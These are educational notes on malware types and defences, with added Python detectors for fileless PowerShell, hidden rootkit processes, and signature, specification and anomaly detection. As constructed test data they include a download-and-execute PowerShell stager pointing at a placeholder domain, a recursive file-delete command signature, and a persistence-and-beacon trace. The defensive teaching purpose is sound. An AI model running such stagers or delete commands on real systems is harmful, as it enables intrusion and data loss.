2. WHAT IS MALWARE?
• Malware is intrusive software designed to damage, disrupt or gain unauthorised
access to computers and computer systems.
• Malware is a contraction of “malicious software”.
• Malware gets installed on your device and performs unwanted tasks without your
consent.
• Some malware is designed mainly to transmit information about your web
browsing habits to a third party; other families steal data, encrypt files or
give an attacker remote control of the machine.
4. VIRUS
• A virus is a program written to enter your computer and damage or alter your
files/data.
• A virus might corrupt or delete data on your computer. Viruses also replicate
themselves by inserting their code into other programs or files.
• The defining difference between a virus and a worm is how they spread, not how
much damage they do: a virus needs a host file and a user action to run, while a
worm spreads on its own. Either one may carry a payload that alters or deletes
data.
• Once downloaded, the virus lies dormant until the infected file is opened and
run.
• Viruses are designed to disrupt a system’s ability to operate. As a result,
viruses can cause significant operational issues and data loss.
5. WORMS
• Worms are malicious software that rapidly replicates and spreads to other
devices on the network.
• Unlike viruses, worms do not need a host program to disseminate and do not
attach themselves to an existing program.
• A worm infects a device via a downloaded file or a network connection, then
multiplies and disperses at an exponential rate.
• Propagation itself does not have to harm data or files on the computer, but
many worms carry a payload that does (Stuxnet, below, sabotaged industrial
control equipment).
• Worms spread by exploiting vulnerabilities in operating systems and the network
services they expose.
• Worms can be used by malicious actors to launch DDoS attacks from the machines
they have infected.
• Eg- Stuxnet
6. SPYWARE
• Spyware is installed, with or without your permission, on your personal
computer to collect information about you, your computer or your browsing
habits. It tracks what you do without your knowledge and sends it to a remote
user.
• Rather than simply disrupting a device’s operations, spyware targets sensitive
information and can grant remote access to attackers.
• Spyware is often used to steal financial or personal information.
• It can also download other malicious programs from the Internet and install
them on the computer.
• Spyware works like adware but is usually a separate program that is installed
unknowingly when you install another freeware program or application.
• A specific type of spyware is a keylogger, which records your keystrokes to
reveal passwords and personal information.
• Eg- DarkHotel
7. ADWARE
• Adware is software that collects data on your computer usage and serves
advertisements to you, often bundled with free applications.
• While adware is not always dangerous, in some cases adware can cause issues
for your system.
• Adware can redirect your browser to unsafe sites, and it can even bundle
Trojan horses and spyware.
• Additionally, significant levels of adware can slow down your system
noticeably.
• Because not all adware is malicious, it is important to have protection that
constantly and intelligently scans these programs rather than blindly
trusting or blocking every ad-supported application.
• Eg- Fireball
8. TROJAN HORSE
• A Trojan horse is not a virus. It is a malicious program that looks like a
genuine application.
• Unlike viruses, Trojan horses do not replicate themselves, but they can be
just as destructive.
• Trojans also open a backdoor into your computer, which gives malicious
users/programs access to your system and allows confidential and personal
information to be stolen.
• Once the user runs it, the Trojan can gain access to sensitive data and then
modify, block, or delete that data.
• Eg- Emotet
9. RANSOMWARE
• Ransomware is malicious software that gains access to a system, encrypts the
files on it so that the user cannot access them, and then demands a financial
payout for the data to be released.
• Ransomware is commonly delivered through a phishing scam.
• By clicking a disguised link or opening an attachment, the user downloads the
ransomware.
• The attacker proceeds to encrypt the data so that it can only be decrypted
with a key the attacker holds. If the attacker receives payment, they may hand
over the key, but there is no guarantee that they will, or that the decryptor
they supply works.
• Eg- RobbinHood
10. FILELESS MALWARE
• Fileless malware is a type of memory-resident malware.
• As the term suggests, it is malware that operates from the victim computer’s
memory, not from files on the hard drive; it typically abuses legitimate,
already-installed tools such as PowerShell or WMI to run.
• Because there is no malicious file on disk to scan, it is harder to detect
than traditional malware, and detection has to rely on process, script and
network telemetry instead.
• It also makes forensics more difficult because the in-memory payload
disappears when the victim computer is rebooted, although the persistence
mechanism (often a registry entry or scheduled task) usually survives.
• In 2017, the Cisco Talos threat intelligence team published an analysis of
fileless malware that they called DNSMessenger, which ran entirely in
PowerShell and received its commands over DNS TXT records.
• Eg- Astaroth
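Because the payload never touches disk, the useful place to look is process-creation telemetry: the command line that launched powershell.exe, and the script hidden inside an -EncodedCommand argument. The following is an added example, not code from the slides or from Cisco Talos; it assumes Sysmon/EDR-style events carrying an image path and command line, and the events it scores are constructed (the stager points at example.invalid, a reserved domain that never resolves).

```python
"""Flag in-memory ("fileless") PowerShell execution from process-creation telemetry.

Added example, not from the original slides. Assumes Sysmon/EDR-style events with
the process image and command line; SAMPLE_EVENTS below are constructed, not real
telemetry, and example.invalid is a reserved, non-resolving domain.
"""
import base64
import binascii
import re

# powershell.exe accepts several abbreviations of -EncodedCommand.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)

# Each indicator scores one point. Flags alone are weak (admins use them too);
# the download cradle and reflective load are the strong signals.
INDICATORS = {
    "encoded-command": ENCODED_FLAG,
    "hidden-window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.IGNORECASE),
    "no-profile-abbrev": re.compile(r"-NoP\b", re.IGNORECASE),
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE),
    "download-cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.IGNORECASE
    ),
    "base64-in-script": re.compile(r"FromBase64String", re.IGNORECASE),
    "reflective-load": re.compile(r"Reflection\.Assembly|Assembly\]::Load", re.IGNORECASE),
}
SUSPICION_THRESHOLD = 2


def is_powershell_host(image: str) -> bool:
    """True for the PowerShell host binaries, matched on file name only."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name in ("powershell.exe", "pwsh.exe", "powershell_ise.exe")


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand, "" if the flag is present but the
    payload does not parse, or None if there is no encoded command at all.
    PowerShell expects base64 over UTF-16LE text, so decode it that way."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return ""
    return raw.decode("utf-16-le", errors="replace")


def analyze(event: dict) -> dict:
    """Score one process-creation event on the raw command line plus the decoded script."""
    result = {"pid": event["pid"], "encoded": False, "decoded": None,
              "indicators": [], "verdict": "benign"}
    if not is_powershell_host(event["image"]):
        return result
    decoded = decode_encoded_command(event["cmdline"])
    haystack = event["cmdline"] if decoded is None else event["cmdline"] + "\n" + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    result.update(encoded=decoded is not None, decoded=decoded, indicators=hits,
                  verdict="suspicious" if len(hits) >= SUSPICION_THRESHOLD else "benign")
    return result


def scan(events) -> list:
    """PIDs judged suspicious, in input order."""
    return [r["pid"] for r in map(analyze, events) if r["verdict"] == "suspicious"]


def _encode_for_powershell(script: str) -> str:
    """Build what `powershell -EncodedCommand` expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed download-and-execute stager; nothing is fetched because the domain is reserved.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

SAMPLE_EVENTS = [
    {"pid": 4120, "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": '"C:\\Windows\\System32\\notepad.exe" C:\\Users\\alice\\notes.txt'},
    {"pid": 5308, "image": _PS,
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + _encode_for_powershell(_STAGER)},
    {"pid": 5400, "image": _PS,
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Temp"},
    {"pid": 5522, "image": _PS,
     "cmdline": 'powershell.exe -Command "' + _STAGER + '"'},
]

if __name__ == "__main__":
    for r in map(analyze, SAMPLE_EVENTS):
        print(r["pid"], r["verdict"], r["indicators"])
```

Two caveats for real deployments: match the host on the binary's signer or OriginalFileName rather than its path, since an attacker can copy powershell.exe under another name; and pair this with PowerShell script-block logging, which records the de-obfuscated script even when the command line only carries a loader.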
11. ROOTKITS
• A rootkit is software that gives malicious actors privileged (root or
administrator) access to a victim’s computer, often with remote control, while
hiding its own presence from the operating system and security tools.
• Rootkits can be injected into applications (user mode), the kernel,
hypervisors, or firmware; the lower the layer, the harder it is to detect or
remove.
• They spread through phishing, malicious attachments, malicious downloads, and
compromised shared drives.
• Rootkits can also be used to conceal other malware, such as keyloggers, by
hiding its files, processes and network connections.
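Concealment is also what gives a rootkit away: a hook that filters a process out of the task list has to leave it intact in some other view, because the kernel must still schedule it. Cross-view comparison, as in the added example below (not code from the slides), enumerates processes two ways and reports any PID that only the lower-level view can see. The live collectors assume a Linux host; the snapshots at the bottom are constructed so that the logic can be checked without a rootkit present.

```python
"""Cross-view detection of processes hidden by a rootkit.

Added example, not from the slides. A rootkit that hooks what ps and top rely on
(for example, filtering the /proc directory listing) can hide a process from the
high-level view, but the kernel still answers lower-level probes such as
kill(pid, 0). Comparing the two views exposes the gap. The snapshots at the
bottom are constructed; the live collectors only work on Linux.
"""
import os


def procfs_pids() -> set:
    """High-level view: PIDs listed in /proc, which is what ps and top read."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}


def _is_thread_of_other_process(pid: int) -> bool:
    """kill(tid, 0) also succeeds for thread IDs; use Tgid to drop them."""
    try:
        with open(f"/proc/{pid}/status") as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) != pid
    except OSError:
        pass  # status unreadable: cannot prove it is a thread, keep it as a candidate
    return False


def probe_pids(max_pid=None) -> set:
    """Low-level view: every PID for which kill(pid, 0) reports a live target.
    EPERM also means 'exists'; only ESRCH means 'no such process'. Walking the
    full pid_max range costs a few seconds in Python."""
    if max_pid is None:
        with open("/proc/sys/kernel/pid_max") as f:
            max_pid = int(f.read())
    alive = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue
        except PermissionError:
            pass
        if not _is_thread_of_other_process(pid):
            alive.add(pid)
    return alive


def hidden_pids(high_level_samples, low_level_samples) -> set:
    """PIDs present in EVERY low-level sample but in NO high-level sample.

    Taking several samples of each view and intersecting removes the noise from
    processes that started or exited between the two enumerations."""
    consistently_alive = set.intersection(*map(set, low_level_samples))
    ever_listed = set.union(*map(set, high_level_samples))
    return consistently_alive - ever_listed


def live_check(samples: int = 3) -> set:
    """Collect both views `samples` times on a Linux host and report the hidden set."""
    high, low = [], []
    for _ in range(samples):
        high.append(procfs_pids())
        low.append(probe_pids())
    return hidden_pids(high, low)


# Constructed snapshots: PID 4242 is a process the rootkit filters out of the
# listing; PID 9001 is a short-lived process that exited after the first probe
# and must not be reported.
SAMPLE_HIGH_LEVEL = [{1, 2, 640, 1187, 3050}] * 3
SAMPLE_LOW_LEVEL = [
    {1, 2, 640, 1187, 3050, 4242, 9001},
    {1, 2, 640, 1187, 3050, 4242},
    {1, 2, 640, 1187, 3050, 4242},
]

if __name__ == "__main__":
    print("hidden (constructed):", hidden_pids(SAMPLE_HIGH_LEVEL, SAMPLE_LOW_LEVEL))
```

This catches rootkits that hook only the enumeration path. A kernel-mode rootkit that also filters kill() and the /proc/<pid> entries defeats both views, which is why the next step up is comparing against a view the rootkit cannot control: a memory image analysed offline, or the disk mounted from a clean system.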
12. KEYLOGGER
• A keylogger is a type of spyware that
monitors user activity. Keyloggers
have legitimate uses; businesses can
use them to monitor employee activity
and families may use them to keep
track of children’s online behaviors.
• However, when installed for malicious
purposes, keyloggers can be used to
steal password data, banking
information and other sensitive
information.
• Keyloggers can be installed on a system through phishing, social engineering
or malicious downloads.
• Eg- Olympic Vision
13. BOT/BOTNETS
• A bot is a software application that performs automated tasks on command.
• Bots are used for legitimate purposes, such as indexing the web for search
engines, but when used for malicious purposes they take the form of
self-propagating malware that connects back to a central command-and-control
server.
• Usually, bots are used in large numbers to create a botnet, a network of
infected devices that the operator directs remotely to launch broad floods of
attacks, such as DDoS attacks. Botnets can become quite expansive.
• For example, the Mirai IoT botnet was estimated at 800,000 to 2.5 million
infected devices.
• Eg- Echobot
14. HOW TO DETECT AND RESPOND TO MALWARE?
• Malware will inevitably penetrate your network.
• You must have defences that provide significant visibility and breach
detection.
• In order to remove malware, you must be able to identify malicious activity
quickly. This requires continuous monitoring of hosts and network traffic, not
a one-off scan.
• Once the threat is identified, you must contain it and remove the malware from
your network, then establish how it got in so that the same path is closed.
15. PROTECTING AGAINST MALWARE
• Anti-malware protection provides a second vital layer of protection for your
computer or network, behind user awareness and timely patching.
• A robust antivirus software package is the primary component of the
technological defences that every personal and business computer system should
have.
• Well-designed antivirus protection has several characteristics. It checks any
newly downloaded program to ensure that it is malware-free.
• It periodically scans the computer to detect and remove any malware that might
have slipped through.
• It is regularly updated to recognise the latest threats.
16. ANTIVIRUS / ANTI-MALWARE SOFTWARE
• For example, Microsoft Security Essentials (for Windows XP, Vista, and
Windows 7) and Windows Defender (for Windows 8, 10 and 11, now branded
Microsoft Defender Antivirus) provide real-time protection.
• The Windows Malicious Software Removal Tool removes a specific set of
prevalent malware families from the system; it is not a substitute for
real-time protection.
• Additionally, several capable antivirus programs are available for free
download from the Internet (usually restricted to non-commercial use).
17. ANTIVIRUS / ANTI-MALWARE SOFTWARE
• Real-time protection: anti-malware software can provide real-time protection
against the installation of malware on a computer. It scans files as they are
written or executed and incoming network data as it arrives, and blocks any
threat it recognises.
• Sandboxing: isolating applications considered high-risk (such as web
browsers, which are a common entry point for malware) so that an exploited
application cannot reach the rest of the system.
18. ANTIVIRUS / ANTI-MALWARE SOFTWARE
• Removal: Anti-malware software programs can be used solely for detection
and removal of malware software that has already been installed onto a
computer. This type of anti-malware software scans the contents of the
Windows registry, operating system files, and installed programs on a
computer and will provide a list of any threats found, allowing the user to
choose which files to delete or keep, or to compare this list to a list of
known malware components, removing files that match.
20. MALWARE DETECTION TECHNIQUES
• Anomaly-based: uses its knowledge of what constitutes normal behaviour to
decide whether a program is malicious; anything that deviates from the learned
baseline is flagged, which can catch new malware but also produces false
positives.
• Specification-based: uses a rule set of what is valid behaviour for a program;
any action outside the specification is treated as malicious.
• Signature-based: uses its characterisation of what is known to be malicious to
decide whether a program is malicious; precise for known samples, blind to
anything without a signature.
21. MALWARE DETECTION TECHNIQUES
• The specific approach is further determined by how the technique gathers the
information used to detect malware.
• Static analysis: examines the program before it executes, e.g. byte sequences,
strings, imports and file hashes.
• Dynamic analysis: observes the program during or after execution, e.g. system
calls, file and registry changes, and network connections seen at runtime.
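The two slides above describe three decision rules (signature, specification, anomaly) and two ways of gathering evidence (static, dynamic). The added example below, which is not code from the slides, puts all of them side by side on constructed inputs: a static signature scanner over raw bytes, and specification- and anomaly-based checks over a runtime trace of (process, operation, argument) records of the kind an EDR agent or sandbox would log. Every hash, byte pattern, rule and trace in it is made up for illustration; the only real thing is the comparison between what each approach catches and what it misses.

```python
"""Signature-, specification- and anomaly-based detection side by side.

Added example, not from the slides. Every hash, byte pattern, rule and trace
below is constructed for illustration; nothing here is a real vendor signature.
"""
import hashlib
import re

# ---- Static (pre-execution), signature-based --------------------------------
# Signatures describe what is KNOWN to be bad: a full-file hash or a byte pattern.
_SAMPLE_DROPPER = b"MZ\x90\x00" + b"constructed-dropper-sample-0001"
KNOWN_BAD_SHA256 = {hashlib.sha256(_SAMPLE_DROPPER).hexdigest(): "Dropper.Constructed.A"}
BYTE_SIGNATURES = [
    (re.compile(rb"beacon-id=[0-9a-f]{8}&host="), "Beacon.Constructed.B"),
    (re.compile(rb"cmd\.exe /c del /q /s \*\.\*"), "Wiper.Constructed.C"),
]


def scan_static(sample: bytes):
    """Return the signature name matching the bytes, or None if nothing matches.
    None means 'not in our signature set', which is not the same as 'benign'."""
    name = KNOWN_BAD_SHA256.get(hashlib.sha256(sample).hexdigest())
    if name:
        return name
    for pattern, sig_name in BYTE_SIGNATURES:
        if pattern.search(sample):
            return sig_name
    return None


# ---- Dynamic (runtime), specification-based ---------------------------------
# A specification describes what is VALID for a program; anything else is a
# violation. Rules are (operation, argument prefix) pairs per process name.
SPEC = {
    "winword.exe": {
        ("open", "C:\\Users\\alice\\Documents\\"),
        ("write", "C:\\Users\\alice\\Documents\\"),
        ("connect", "update.vendor.invalid:443"),
    }
}


def check_specification(trace):
    """Return the trace records not covered by the program's specification."""
    violations = []
    for proc, op, arg in trace:
        allowed = SPEC.get(proc)
        if allowed is None:
            continue  # no specification for this program: no verdict either way
        if not any(op == a_op and arg.startswith(prefix) for a_op, prefix in allowed):
            violations.append((proc, op, arg))
    return violations


# ---- Dynamic (runtime), anomaly-based ---------------------------------------
# A baseline describes what is NORMAL, learned from known-good runs; records whose
# (process, operation) pair never appeared in training are anomalies.
def build_baseline(normal_traces):
    return {(proc, op) for trace in normal_traces for proc, op, _ in trace}


def detect_anomalies(baseline, trace):
    return [(proc, op, arg) for proc, op, arg in trace if (proc, op) not in baseline]


# ---- Constructed inputs ------------------------------------------------------
NORMAL_TRACES = [
    [("winword.exe", "open", "C:\\Users\\alice\\Documents\\q1.docx"),
     ("winword.exe", "write", "C:\\Users\\alice\\Documents\\q1.docx"),
     ("winword.exe", "connect", "update.vendor.invalid:443")],
    [("winword.exe", "open", "C:\\Users\\alice\\Documents\\memo.docx")],
]
# A macro document that spawns a shell, persists via the Startup folder and beacons out.
MALICIOUS_TRACE = [
    ("winword.exe", "open", "C:\\Users\\alice\\Documents\\invoice.docx"),
    ("winword.exe", "exec", "C:\\Windows\\System32\\cmd.exe /c start upd.vbs"),
    ("winword.exe", "write", "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\"
                             "Start Menu\\Programs\\Startup\\upd.vbs"),
    ("winword.exe", "connect", "203.0.113.7:8080"),  # TEST-NET-3 documentation address
]
BEACON_SAMPLE = b"GET /?beacon-id=1a2b3c4d&host=ALICE-PC HTTP/1.1"
UNKNOWN_SAMPLE = b"hello, this blob matches no signature"


def run_all():
    baseline = build_baseline(NORMAL_TRACES)
    return {
        "static": [scan_static(s) for s in (_SAMPLE_DROPPER, BEACON_SAMPLE, UNKNOWN_SAMPLE)],
        "spec_violations": check_specification(MALICIOUS_TRACE),
        "anomalies": detect_anomalies(baseline, MALICIOUS_TRACE),
    }


if __name__ == "__main__":
    for key, value in run_all().items():
        print(key, value)
```

The output illustrates the trade-offs the slides name. The signature scanner identifies the two samples it has signatures for and says nothing useful about the third. The specification check flags all three malicious actions because its rules are argument-aware. The anomaly detector, which only learned (process, operation) pairs, flags the shell spawn but misses the Startup-folder write and the beacon, since Word writing files and opening connections both look normal; a richer baseline (paths, destinations) would narrow that gap at the cost of more false positives.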